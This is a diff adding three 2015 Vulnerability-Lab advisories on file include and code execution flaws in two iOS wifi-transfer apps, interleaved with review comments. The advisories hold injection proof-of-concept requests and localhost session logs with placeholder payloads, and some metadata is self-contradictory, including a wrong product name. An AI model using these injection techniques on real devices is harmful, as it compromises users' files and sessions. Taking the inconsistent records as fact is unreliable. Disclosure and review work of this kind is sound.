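+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+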
206
platforms/ios/webapps/36796.txt
Executable file
|
@ -0,0 +1,206 @@
|
|||
Document Title:
|
||||
===============
|
||||
Photo Manager Pro v4.4.0 iOS - File Include Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1445
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-03-12
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1445
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
6.9
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app?
|
||||
Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer
|
||||
and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer
|
||||
Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing.
|
||||
Basic Transfer: Import/Export photos from/to the Photos app.
|
||||
|
||||
(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered a locla file include vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-03-12: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Linkus
|
||||
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A local file include web vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
|
||||
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
|
||||
commands to compromise the mobile web-application.
|
||||
|
||||
The web vulnerability is located in the `filename` value of the `upload.action` module. Remote attackers are able to inject own files with
|
||||
malicious `filename` values in the `upload.action` POST method request to compromise the mobile web-application. The local file/path include
|
||||
execution occcurs in the index dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of
|
||||
the `wifi interface` in connection with the vulnerable upload service module.
|
||||
|
||||
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute unique
|
||||
local malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
|
||||
To exploit the bug it is required to use the local device > wifi sync or (remote) the wifi gui.
|
||||
|
||||
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
|
||||
Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
|
||||
of the local file include web vulnerability results in mobile application or device compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] upload.action
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] filename
|
||||
|
||||
Affected Module(s):
|
||||
[+] disp_photo.action
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC:
|
||||
http://localhost:8080/disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
<div id="photo_content">
|
||||
<img id="photo" src="disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png" height="606"></div>
|
||||
|
||||
|
||||
--- Poc Session Logs [POST] (Inject) ---
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/upload.action?folderID=5 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[31] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:8080/upload.html?folderID=5]
|
||||
Cookie[isenabledpasscode=false]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
POST_DATA[-----------------------------15932100885119
|
||||
Content-Disposition: form-data; name="is_submitted"
|
||||
false
|
||||
-----------------------------15932100885119
|
||||
Content-Disposition: form-data; name="upload_file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]2.png"
|
||||
Content-Type: image/png
|
||||
-
|
||||
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/upload.html?folderID=5 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8085] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Cookie[isenabledpasscode=false]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[8085]
|
||||
Date[Do., 05 März 2015 20:52:18 GMT]
|
||||
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:8080/upload.action?folderID=
|
||||
http://localhost:8080/upload.html?folderID=
|
||||
http://localhost:8080/disp_photo.action?filename=
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
|
||||
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of thelocal file inelcude web vulnerability in the photo manager wifi service is estimated as high. (CVSS 6.9)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
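Review bot: The vulnerability class is asserted rather than demonstrated: the PoC shows the uploaded multipart `filename` (`./[LOCAL FILE INCLUDE VULNERABILITY!]2.png`) reflected unchanged into the `src` attribute of the `<img id="photo" ...>` element served by `disp_photo.action`, but the session log contains no response in which local file content is actually returned, so the evidence supports unsanitised path handling plus missing output encoding in the wifi web UI, not a confirmed file include. The metadata is also inconsistent with itself — `Exploitation Technique: Local` while Technical Details and the PoC section repeatedly say "remote attackers" — and defenders triaging from this record need one consistent answer. I would qualify the abstract to `discovered a filename validation vulnerability (path handling / output encoding) in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application` and extend the fix paragraph with `Canonicalize the stored filename on the server, reject any value containing a path separator or ".." component, and HTML-attribute-encode the name where it is emitted into disp_photo.action and the directory listing.` The typos `locla` (Abstract) and `thelocal file inelcude` (Security Risk) should be corrected as well.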
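--- a/platforms/ios/webapps/36797.txt
+++ b/platforms/ios/webapps/36797.txt
@@ -0,0 +1,231 @@
+Document Title:
+===============
+Mobile Drive HD v1.8 - File Include Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1446
+
+
+Release Date:
+=============
+2015-03-11
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1446
+
+
+Common Vulnerability Scoring System:
+====================================
+6.4
+
+
+Product & Service Introduction:
+===============================
+Mobile Drive is the ideal app for anyone who transfer documents between PC, iPad and Cloud. Mobile Drive allows you to manage
+documents and organize them. You can quickly upload and download documents via email and the popular cloud storage services.
+
+(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/mobile-drive-hd-document-cloud/id626102554 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the Mobile Drive HD v1.8 iOS mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-03-11: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Keke Cai
+Product: Mobile Drive HD- iOS Mobile Web Application 1.8
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official USB Disk Free - File Manager & Transfer v1.0 iOS mobile application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
+to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
+`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
+the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface`
+in connection with the vulnerable upload POST method request.
+
+Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
+attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
+
+The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
+of the local file include web vulnerability results in mobile application compromise or connected device component compromise.
+
+Request Method(s):
+[+] [POST]
+
+Vulnerable Module(s):
+[+] Upload
+
+Vulnerable Parameter(s):
+[+] filename
+
+Affected Module(s):
+[+] Index File Dir Listing (http://localhost:8080/)
+
+
+Proof of Concept (PoC):
+=======================
+The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+PoC:
+http://localhost:8080/files/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png
+
+
+PoC: Vulnerable Source
+<tr class="shadow"><td><a href="/files/%3Ciframe%3E2.png" class="file">[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a></td><td class='del'>
+<form action='/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png' method='post'><input name='_method' value='delete' type='hidden'/>
+<input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr></tbody>
+</table>
+
+
+--- PoC Session Logs [POST] ---
+Status: 302[Found]
+POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[67] Mime Type[text/html]
+Request Header:
+Host[localhost:8080]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Referer[http://localhost:8080/]
+Connection[keep-alive]
+POST-Daten:
+POST_DATA[-----------------------------21144193462
+Content-Disposition: form-data; name="newfile"; filename="[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
+Content-Type: image/png
+-
+Status: 200[OK]
+GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2739] Mime Type[application/x-unknown-content-type]
+Request Header:
+Host[localhost:8080]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Referer[http://localhost:8080/]
+Connection[keep-alive]
+Response Header:
+Accept-Ranges[bytes]
+Content-Length[2739]
+Date[Mo., 09 März 2015 14:24:12 GMT]
+-
+Status: 200[OK]
+GET http://localhost:8080/jquery.js Load Flags[LOAD_NORMAL] Größe des Inhalts[55774] Mime Type[application/x-unknown-content-type]
+Request Header:
+Host[localhost:8080]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
+Accept[*/*]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Referer[http://localhost:8080/]
+Connection[keep-alive]
+Response Header:
+Accept-Ranges[bytes]
+Content-Length[55774]
+Date[Mo., 09 März 2015 14:24:12 GMT]
+-
+Status: 200[OK]
+GET http://localhost:8080/files?Mon%20Mar%2009%202015%2015:26:02%20GMT+0100 Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[62] Mime Type[text/plain]
+Request Header:
+Host[localhost:8080]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
+Accept[application/json, text/javascript, */*]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+X-Requested-With[XMLHttpRequest]
+Referer[http://localhost:8080/]
+Connection[keep-alive]
+Response Header:
+Accept-Ranges[bytes]
+Content-Length[62]
+Cache-Control[private, max-age=0, must-revalidate]
+Content-Type[text/plain; charset=utf-8]
+Date[Mo., 09 März 2015 14:24:13 GMT]
+
+
+Reference(s):
+http://localhost:8080/files/
+http://localhost:8080/jquery.js
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
+disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
+Encode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.4)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+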
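Review bot: The Technical Details section names the wrong product: `A local file include web vulnerability has been discovered in the official USB Disk Free - File Manager & Transfer v1.0 iOS mobile application.` contradicts the title, the Affected Product(s) entry (`Mobile Drive HD- iOS Mobile Web Application 1.8`) and the rest of the record, and reads like a paste from a different advisory; it should say `... in the official Mobile Drive HD v1.8 iOS mobile application.` so that anyone matching this entry against an inventory does not mis-attribute it. The vulnerable-source excerpt (`<a href="/files/%3Ciframe%3E2.png" ...>` followed by a stray `</iframe>`) shows the `newfile` filename emitted into the directory listing without HTML encoding — a persistent markup injection, which the third fix sentence already addresses — while no response in the logs shows local file content being served for the `/files/%3C./[...]%3E/2.png` URL, so the "file include" class should be hedged in the abstract and Security Risk paragraph. `Exploitation Technique: Local` also conflicts with "remote attackers" in Technical Details and "local attackers" in the PoC paragraph; pick one. Typo: `occcurs`.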
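--- a/platforms/ios/webapps/36798.txt
+++ b/platforms/ios/webapps/36798.txt
@@ -0,0 +1,265 @@
+Document Title:
+===============
+Photo Manager Pro 4.4.0 iOS - Code Execution Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1444
+
+
+Release Date:
+=============
+2015-03-10
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1444
+
+
+Common Vulnerability Scoring System:
+====================================
+8.6
+
+
+Product & Service Introduction:
+===============================
+Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app?
+Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer
+and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer
+Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing.
+Basic Transfer: Import/Export photos from/to the Photos app.
+
+(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a code execution vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-03-10: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Linkus
+Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Critical
+
+
+Technical Details & Description:
+================================
+An arbitrary code execution vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
+The vulnerability allows remote attackers to execute malicious codes on the application-side of the vulnerable app to compromise the
+target mobile device.
+
+The vulnerability is located in the `folderName` value of the `newfolder.action` module. Remote attackers are able to manipulate the
+`folderName` value in the `index.html#?w=300` file POST method request to compromise the application, user session information or connected
+device components. The attacker tampers the new Folder POST method request to exchange the regular folderName value with special crafted code.
+The input context is becomes visible at the main index service or subfolder (path). The vector of the vulnerability is located on the application-side.
+
+The security risk of the arbitrary code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
+Exploitation of the arbitrary code execution vulnerability requires no user interaction or privileged web-application user account with password.
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent
+manipulation function or connected module context.
+
+Request Method(s):
+[+] [POST]
+
+Vulnerable Module(s):
+[+] newfolder.action
+
+Vulnerable Parameter(s):
+[+] folderName
+
+Affected Module(s):
+[+] Index (http://localhost:8080)
+[+] Sub Category Path
+
+
+Proof of Concept (PoC):
+=======================
+The code execution vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Create Folder
+
+<div id="main"><div id="breadcrumb">Home</div>
+<div id="content"><ul id="folders_ul"><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=1"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=1">Family</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=2"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=2">Friends</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=3"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=3">Travel</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=4"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=4">Shopping</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=5"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></div></iframe></a></div></li></ul></div>
+</div>
+
+... after surfing to the created folder
+
+<div id="wrapper">
+<div id="header">
+<div id="title">
+<h1>Photo Manager Pro</h1>
+</div>
+</div>
+<div id="main">
+<div id="breadcrumb"><span id="breadcrumb_span"><a href="index.html">Home</a><label> > <a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></label></x></a></label></span></div>
+<form id="download_form" action="download.action" method="post">
+<div id="content"><ul></ul></div>
+</form>
+</div>
+
+
+PoC: Vulnerable Source
+}
+
+function createFolder() {
+$.ajax({
+type: 'POST',
+url: 'newfolder.action',
+cache: false,
+dataType: 'json',
+data: {folderName:$('#foldername').attr('value'), isSubfolder:$('#is_subfolder_hidden').attr('value'), parentFolderID:$('#parent_folder_hidden').attr('value')},
+async: false,
+success: function(result) {
+window.location.reload(false);
+}
+});
+}
+</script>
+
+
+--- Poc Session Logs [POST] (Inject) ---
+Status: 200[OK]
+POST http://localhost:8080/newfolder.action
+Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type]
+Request Header:
+Host[localhost:8080]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
+Accept[application/json, text/javascript, */*; q=0.01]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
+X-Requested-With[XMLHttpRequest]
+Referer[http://localhost:8080/index.html]
+Content-Length[50]
+Cookie[isenabledpasscode=false]
+Connection[keep-alive]
+Pragma[no-cache]
+Cache-Control[no-cache]
+POST-Daten:
+folderName[*/-CODE EXECUTION VULNERABILITY!;]
+isSubfolder[0]
+parentFolderID[0]
+Response Header:
+Accept-Ranges[bytes]
+Content-Length[23]
+Date[Do., 05 März 2015 20:34:46 GMT]
+
+Status: 200[OK]
+GET http://localhost:8080/index.html
+Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[9421] Mime Type[application/x-unknown-content-type]
+Request Header:
+Host[localhost:8080]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Referer[http://localhost:8080/browse_folder.html?folderID=6]
+Cookie[isenabledpasscode=false]
+Connection[keep-alive]
+Cache-Control[max-age=0]
+Response Header:
+Accept-Ranges[bytes]
+Content-Length[9421]
+Date[Do., 05 März 2015 20:34:46 GMT]
+
+Status: 200[OK]
+GET http://localhost:8080/javascript/linkus.js
+Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[397] Mime Type[application/x-unknown-content-type]
+Request Header:
+Host[localhost:8080]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
+Accept[*/*]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Referer[http://localhost:8080/index.html]
+Cookie[isenabledpasscode=false]
+Connection[keep-alive]
+Cache-Control[max-age=0]
+Response Header:
+Accept-Ranges[bytes]
+Content-Length[397]
+Date[Do., 05 März 2015 20:34:46 GMT]
+
+
+
+Reference(s):
+http://localhost:8080/index.html
+http://localhost:8080/newfolder.action
+http://localhost:8080/index.html#?w=300
+http://localhost:8080/browse_folder.html?folderID=5
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the vulnerable folderName value. Restrict the input and filter the context by usage of a own exception to
+prevent the application-side code execution.
+
+
+Security Risk:
+==============
+The security risk of the code execution vulnerability in the photo manager wifi service is estimated as high. (CVSS 8.6)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
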